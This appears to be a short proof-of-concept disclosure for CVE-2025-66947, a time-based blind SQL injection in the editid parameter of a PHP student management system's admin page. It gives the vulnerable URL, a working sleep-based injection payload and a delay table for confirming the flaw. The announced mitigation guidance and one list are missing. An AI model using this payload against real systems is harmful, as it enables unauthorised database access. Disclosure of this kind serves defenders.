
Proof-of-concept for time-based blind SQL injection in a PHP admin panel. Demonstrates exploitation via unsanitized GET parameter, with mitigation guidance for defensive use.
⏱️ Visual comparison: normal response vs ~6s delayed response
TL;DR: A GET parameter in an admin module allows time-based SQL injection via response delays.
A 𝗧𝗶𝗺𝗲 𝗯𝗮𝘀𝗲𝗱 𝗯𝗹𝗶𝗻𝗱 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝘃𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 exists in krishanmuraiji SMS v1.0 due to improper validation of a GET parameter in an administrative module.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Payload | Delay |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Consistent delay = SQL Injection Confirmed
This vulnerability pattern commonly appears in:
Even when authentication is required and errors are hidden,
Time based SQL injection remains exploitable and dangerous.
Severity: High
CVE-2025-66947
Ranjan KumarThis PoC is provided for educational and defensive purposes only.
CVE-2025-66947, SQL Injection, Time-Based Blind SQL Injection, PHP, Admin Panel